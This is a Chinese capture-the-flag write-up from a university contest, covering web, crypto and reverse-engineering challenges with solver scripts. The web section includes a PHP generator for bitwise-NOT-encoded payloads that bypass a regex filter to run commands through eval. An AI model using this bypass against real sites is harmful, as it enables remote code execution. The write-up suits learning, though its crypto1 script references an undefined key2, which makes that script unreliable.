标签:%# v0 v1 flag 6.4 value wp print 校赛
校赛
能取得名次很开心,之后还要继续努力。遗憾的是misc没有解,还是要多花时间。
web
入门
f12查看源码在网络里找到flag即可
shell & shell_revenge
两道题一样的解法,看php代码是用正则表达式过滤了很多字符。找了些资料,了解到用取反就不会触发正则表达式,是ctfshow上的原题。使用如下PHP代码:
<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
?>
命令行执行,先输入system,再用ls /查看,传参给eval,页面回显flag home,再输入命令 cat /flag,继续传参给eval即可获得flag
Crypto
贝斯手
题目暗示了是base家族,先后使用base64 32 long_to_bytes 85和58解密即可获得flag
from Crypto.Util.number import *
from base64 import *
import base58
cipher='R1EzVElOQlRHSTNVSU5aVUdRNERNTlpWR0UyREVOS0dHWTJES01aVUlZMkRHTkJSR1JCVE9OUlhHNDNFSU5CWUdSRERNUUpXR00yVElOQlNHUTNUTU1aV0dBMkRPTkJSR1laVE9OSldHQTNES01SV0dZMkRLTVJXSU0zRE9OSlFHVTRETVJCVUdRWlVHTVpVR1VaVE9SQlhJUTJETz09PQ=='
res=b64decode(cipher)
res=b32decode(res)
res=long_to_bytes(int(res,16))
res=b85decode(res)
res=base58.b58decode(res)
print(res)
flag:scuctf{M4ny_k1nds_0f_13a5e!}
crypto1
预测随机数,有现成的库可以用。要将312个64位数拆成624个32位数,因为32位输出顺序是abcd,而64位的顺序是badc,所以要反过来取,注意还要填充,脚本如下:
from Crypto.Util.number import *
from randcrack import RandCrack
from Crypto.Cipher import AES
f=open("./test",'rb')
rc=RandCrack()
for i in range(312):
a=int(f.readline())
a=bin(a)[2:].zfill(64)
c=int('0b'+a[:32],2)
b=int('0b'+a[32:],2)
rc.submit(c)
rc.submit(b)
f.close()
res=rc.predict_getrandbits(128)
key1=(long_to_bytes(res))
res=open('./out','rb').read()
aes1 = AES.new(key1, AES.MODE_CBC, b"\x00"*16)
flag=aes1.decrypt(res)
print(flag)
aes2 = AES.new(key2, AES.MODE_CBC, b"\x00"*16)
flag=aes2.decrypt(res)
print(flag)
flag:scuctf{af0sd_f8}
crypto2
简单的CopperSmith
p是512位的,x是128位,将x首元变为1。之后的条件就是p_是1019位,未知低128位,那么用CopperSmith Method即可解决。得到的p再在模n下和2^ex相乘即可得到真正的p。附上脚本:
'''sage
n = 85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817
e = 65537
c = 83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287
pbar = 4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
kbits = 128
print("upper %d bits (of %d bits) is given" % (pbar.nbits()-kbits, pbar.nbits()))
PR.<x> = PolynomialRing(Zmod(n))
f = x + pbar
x0 = f.small_roots(X=2^kbits, beta=0.5)[0]
p = x0 + pbar
print(p)
'''
from Crypto.Util.number import *
import random
import gmpy2
from sympy import nextprime
leak=1145141920069
n= 85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817
c= 83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287
pbar=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
ex = 384
p_=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697896644308153471350247313227602240058029
p=p_*2**ex%n
q=n//p
phi=(p-1)*(q-1)
d=gmpy2.invert(65537,phi)
m=gmpy2.powmod(c,d,n)
print(long_to_bytes(m))
flag:scuctf{f05fe93d159b398fe25f280d94241261}
RE
ez_fps
Unity游戏,打开是个枪战游戏。DIE一查,PE64
把Managed文件夹里的Assembly-CSharp.dll扔到dnSpy64里面,马上发现现成flag
// Token: 0x0600003B RID: 59 RVA: 0x00003A20 File Offset: 0x00001C20
public static string TryGetFlag()
{
if (Flag.score >= 100)
{
return "scuctf{AK47_b4d_PP_Bizon_g00d}";
}
return Flag.score.ToString();
}
pixel
SMC
获取屏幕上位于401,401的像素点的色值,然后进行SMC
可以根据函数开头的
push ebp
mov ebp, esp
这种常见开头来作为线索,
反推出这个颜色值,然后直接就能输出flag了
0x61^0x55 = 0x34
0x8b^0xbb = 0x30
0xec^0xdd = 0x31
所以:
313034h
然后跑出结果
scuctf{pixel!pixel!pixel!}
rvm
ruby脚本,是个恶俗虚拟机
(肯定取材于ciscn)
a = '''
20041
20161
20276
20334
20458
20514
20605
20798
20839
20984
21064
21163
21269
21314
21452
21586
21613
21778
21875
21987
22080
22165
22279
22369
22476
22502
22676
'''
b = [41,61,76,34,58,14,5,98,39,84,64,63,69,14,52,86,13,78,75,87,80,65,79,69,76,2,76]
c = [93,88,52,69,67,98,135,24,89,56,196,84,123,143,90,223,76,201,206,36,43,201,7,14,203,124,212]
d = [b[i]^c[i] for i in range(27)]
e = [chr(d[i]-i-1) for i in range(27)]
for i in e:
print(i, end='')
#scuctf{ruby_1s_y0ur_fr13nd}
baby_maze
是个迷宫题,但是有点复杂,有100个迷宫函数,且里面添加了一大堆
push rax
rdrand rax
pop rax
这种没用的指令
反正二话不说,直接写jio本patch掉
然后开始用angr梭哈
下面是patch脚本
#!/usr/bin/env python
with open("baby_maze", "rb") as f:
binary = f.read()
list_binary = list(binary)
for i in range(len(binary)):
if binary[i] == 0x50:
if binary[i+1] == 0x48 and binary[i+2] == 0x0F and binary[i+3] == 0xC7 and binary[i+4] == 0xF0 :
if binary[i+5] == 0x58:
list_binary[i] = 0x90
list_binary[i+1] = 0x90
list_binary[i+2] = 0x90
list_binary[i+3] = 0x90
list_binary[i+4] = 0x90
list_binary[i+5] = 0x90
with open("baby_maze_altered", "wb") as ff:
ff.write(bytes(list_binary))
下面是angr一把梭
import angr
p=angr.Project("baby_maze")
ff = open("flag.txt", "w")
for i in range(0,100):
state=p.factory.blank_state(addr=0xa6aac+0x400000+i*0x16)
#state.stack_push(state.regs.rbp)
#state.regs.rbp = state.regs.rsp
sm=p.factory.simgr(state)
sm.explore(find=0xa6ace+0x400000+i*0x16)
if sm.found:
fs = sm.found[0]
print(fs.posix.dumps(0))
ff.write(fs.posix.dumps(0).decode())
#print(fs.posix.dumps(1))
else:
print("no")
ff.close()
标签:%#,v0,v1,flag,6.4,value,wp,print,校赛 来源: https://blog.csdn.net/shikaku_/article/details/117622087
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。